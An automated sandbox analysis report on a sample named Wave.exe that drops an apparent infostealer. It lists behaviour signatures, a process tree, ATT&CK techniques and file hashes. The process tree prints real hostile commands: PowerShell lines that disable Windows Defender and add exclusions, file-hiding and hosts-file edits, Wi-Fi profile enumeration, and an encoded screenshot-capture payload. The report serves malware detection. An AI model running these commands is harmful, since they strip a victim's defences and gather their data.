Analysis

  • max time kernel
    43s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 09:29

General

  • Target

    Wave.exe

  • Size

    4.1MB

  • MD5

    c2ce7247b063fb5f3e136e82b444a297

  • SHA1

    a38c3b7e4f66cecda9adc17350422f845aecfad8

  • SHA256

    0c7ae7e72467ca3a226ee0d4a395ed8ac4f88c7e494baa13fdceb56ea2886ee3

  • SHA512

    b2f587a43fb4c05c5c8ce90af1dda68f9048a8344ef10de69928e5df0fe498c691af5bf0de9f66fa5c068f0523eb7c331bdf2825cc662ef2b4beb54a639cd93a

  • SSDEEP

    98304:JiSS8sEUwvpuDO0+4dUkAuNRW2s0QZE6B0HkWymCTxVpN8RVfo463RA:JU8sE9xfRkVTWT0oFaEBTTxPAVg4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\skuld.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3260
    • C:\ProgramData\skuld.exe
      "C:\ProgramData\skuld.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Adds Run key to start application
      • Maps connected drives based on registry
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\ProgramData\skuld.exe
        3⤵
        • Views/modifies file attributes
        PID:1640
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        3⤵
        • Views/modifies file attributes
        PID:2268
      • C:\Windows\System32\Wbem\wmic.exe
        wmic csproduct get UUID
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:880
      • C:\Windows\System32\Wbem\wmic.exe
        wmic path win32_VideoController get name
        3⤵
        • Detects videocard installed
        • Suspicious use of AdjustPrivilegeToken
        PID:3440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\skuld.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1088
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        3⤵
          PID:4284
        • C:\Windows\System32\Wbem\wmic.exe
          wmic cpu get Name
          3⤵
            PID:1836
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4204
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:4764
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            3⤵
              PID:2484
            • C:\Windows\system32\attrib.exe
              attrib -r C:\Windows\System32\drivers\etc\hosts
              3⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:692
            • C:\Windows\system32\attrib.exe
              attrib +r C:\Windows\System32\drivers\etc\hosts
              3⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:2808
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              3⤵
                PID:2384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of WriteProcessMemory
                PID:1580
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\waxv0rnb\waxv0rnb.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3536
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EB5.tmp" "c:\Users\Admin\AppData\Local\Temp\waxv0rnb\CSC93D02CDA53F048C897F52046FCAFA8D.TMP"
                    5⤵
                      PID:5048
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              1⤵
                PID:8

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Execution

              Command and Scripting Interpreter

              1
              T1059

              PowerShell

              1
              T1059.001

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              2
              T1112

              Subvert Trust Controls

              1
              T1553

              Install Root Certificate

              1
              T1553.004

              Hide Artifacts

              1
              T1564

              Hidden Files and Directories

              1
              T1564.001

              Credential Access

              Unsecured Credentials

              3
              T1552

              Credentials In Files

              3
              T1552.001

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              4
              T1082

              Peripheral Device Discovery

              1
              T1120

              Collection

              Data from Local System

              3
              T1005

              Command and Control

              Web Service

              1
              T1102

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\skuld.exe
                Filesize

                9.5MB

                MD5

                43fcd3b29eeccf8c7f116dac0966089f

                SHA1

                ea9e2d9476082ce8222f9c5f106f3f5c10fff8f6

                SHA256

                229fb73dfa0642ae2b2ee8b32d99b3b20cbebb6087b4581479322a16887b6010

                SHA512

                01ef822e91a00efe78d9c0c5948205693f86477cc74d8eb5495928931df5b102cf85c63cae7b1e19497547bb2869c5495eeef389f19f3dd21fcd0376cfd2a8fa

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                6d42b6da621e8df5674e26b799c8e2aa

                SHA1

                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                SHA256

                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                SHA512

                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                60945d1a2e48da37d4ce8d9c56b6845a

                SHA1

                83e80a6acbeb44b68b0da00b139471f428a9d6c1

                SHA256

                314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

                SHA512

                5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                45514adcd9a8214c4e769d7eafff8518

                SHA1

                ca1be5f767a21be2aabf376dd286462095cfd56f

                SHA256

                bb58c2419cca90776019b0202a377a9287e45a266093b0878bf60dae59640c1b

                SHA512

                3a8c56553f83d8d5f4532f326385d5b311ae0ba0f67967685e8d5f17a7302eec421fc0ab572617987624b623e74d523040068a3ed0bffc26a72e667df0f12da3

              • C:\Users\Admin\AppData\Local\Temp\RES7EB5.tmp
                Filesize

                1KB

                MD5

                b0da5daee3038d1cca19a815052fdca0

                SHA1

                92d60b83bb553fa0ee67efaaa6b067df80592169

                SHA256

                1c6e7941d1bf5300aa4cc4383e00cac272167a7dab6796e7c5d222bf9d816b0a

                SHA512

                bb19c343c3b4b32477d4101ed8711168740cd542d04ce7ae17d02b4407a7fdc7f4fb25aae8dc603fb3e413141c8aea46befc1ea6367fdb68f9946b1ab1a6cb8e

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_asajrgyy.13d.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\vhS2UOrnGc\Display (1).png
                Filesize

                413KB

                MD5

                6b16dbee8a442cc78d99c346d86f2dc7

                SHA1

                357a064b926ca4181207d3ca0d3be87d2f941c3e

                SHA256

                d22826b2c9a8316aeca203096c05e2f702af2c522ca970d1a5b22d72c98a704a

                SHA512

                76eac4d8b055eefc4509a27629519bbbbf9c431d6da3b2bb9fe95c322d86150cf3da69ba6ee252d13e0ed365b444e9fb61e5126e933d7871b92da2910462db6e

              • C:\Users\Admin\AppData\Local\Temp\waxv0rnb\waxv0rnb.dll
                Filesize

                4KB

                MD5

                f24e01571f2ef87fbdbdbd62100fab2e

                SHA1

                c06296c1ab42c217c0f85a9a6e913820dbcf83e7

                SHA256

                37a16fa7ab9058e6c1f629bb3b15a01a42bae2a3ac0869513affa5fc5c628f2f

                SHA512

                e68fa490aff31f5cad0c068b4dd59e0786b4d0b43ea6dca88eda86037cfb43cb32cf79291168338fe11e32d59f22893f879affd846fbe737f36ef0af7b7dba2f

              • C:\Windows\System32\drivers\etc\hosts
                Filesize

                2KB

                MD5

                6e2386469072b80f18d5722d07afdc0b

                SHA1

                032d13e364833d7276fcab8a5b2759e79182880f

                SHA256

                ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                SHA512

                e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

              • \??\c:\Users\Admin\AppData\Local\Temp\waxv0rnb\CSC93D02CDA53F048C897F52046FCAFA8D.TMP
                Filesize

                652B

                MD5

                dc31a5dd364fb6ddc86f9c82cdb5fe8f

                SHA1

                cda02af2c4705fd95ef4acb0b96b775cfa6e5562

                SHA256

                788d85b1ab7bf3af1ba920000eec4f251497bf4a5a91909a8196ff1c4463c77d

                SHA512

                21de3d6744a491de5b0000cf7ef58e35178d4d79b861d72788100f7b775b5ba761f15443511a7a4bca496434064414ec1b37b82bf71e404110ff7a43bda016bb

              • \??\c:\Users\Admin\AppData\Local\Temp\waxv0rnb\waxv0rnb.0.cs
                Filesize

                1004B

                MD5

                c76055a0388b713a1eabe16130684dc3

                SHA1

                ee11e84cf41d8a43340f7102e17660072906c402

                SHA256

                8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                SHA512

                22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

              • \??\c:\Users\Admin\AppData\Local\Temp\waxv0rnb\waxv0rnb.cmdline
                Filesize

                607B

                MD5

                3b13de75bca8ad4bdefe0fb8d30537ca

                SHA1

                98b12d9815ca93d330d872af2eb3bb862c984849

                SHA256

                bd3d4a6bb0ff62862c051bc2d9038a5ec69e6a2a30bbd207d27f7d7ee706b15f

                SHA512

                2344581cb5c1a9ffb2376e7afffcb98bf020c88153642586fe1d01a073a66d75f5ee672863f96dfb3662b803140324f79d615fca506c09dd0b3aa2fb58c88aa8

              • memory/1580-88-0x00000172C65B0000-0x00000172C65B8000-memory.dmp
                Filesize

                32KB

              • memory/3260-3-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3260-11-0x00000216E4EA0000-0x00000216E4EC2000-memory.dmp
                Filesize

                136KB

              • memory/3260-4-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3260-5-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3260-18-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3328-1-0x00000000006E0000-0x0000000000AFA000-memory.dmp
                Filesize

                4.1MB

              • memory/3328-0-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp
                Filesize

                8KB

              • memory/3328-2-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3328-93-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp
                Filesize

                8KB

              • memory/3328-94-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB

              • memory/3328-96-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp
                Filesize

                10.8MB